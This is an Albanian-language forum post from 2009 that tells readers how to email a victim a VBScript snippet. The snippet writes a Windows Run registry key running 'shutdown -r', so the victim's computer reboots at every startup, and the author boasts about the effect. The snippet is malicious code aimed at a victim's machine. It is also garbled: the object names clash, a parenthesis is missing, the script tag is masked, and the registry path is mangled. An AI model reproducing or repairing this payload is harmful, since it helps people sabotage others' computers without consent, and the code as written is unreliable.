Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
ForumForum  PortaliPortali  KėrkoKėrko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

 

 Prish pc-n dikujna pej msn

Shko poshtė 
AutoriMesazh
visarockk
Admin
visarockk

Numri i postimeve : 214
Join date : 31/01/2009
Age : 25
Location : kosov./ferizaj.

Prish pc-n dikujna pej msn Empty
MesazhTitulli: Prish pc-n dikujna pej msn   Prish pc-n dikujna pej msn Icon_minitimeSat Jan 31, 2009 9:30 pm

Code te cilat e shkymin kompjuterin edhe code te tjera

Hym ne emailin tone ne Hotmail dhe shkojme dhe krijojme nje mesazh te ri!
Shenojme emailin e viktimes dhe ne titullin(subject) shenojme dicka atraktive dhe ne pjesen ku e shenojm mesazhin shenojme ket:
--------------------------------------------------------------------------

******** ****************="vbscript">
on error resume next
dim ok
set ok=CreateObject("Wscript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"


--------------------------------------------------------------------------
Viktima me hapjen e ketij emaili, ne funksion do te hyn kodi qe eshe pak me nalt, do ti shkymet kompjuteri! dhe cdoher kur te Starton kopmjuterin! per 24 sekonda do ti shkymet hehehe Very Happy:P
Mbrapsht nė krye Shko poshtė
http://www.ferizaji-gaming.tk
 
Prish pc-n dikujna pej msn
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: Lojra / Gamez :: Te ndryshme-
Kėrce tek: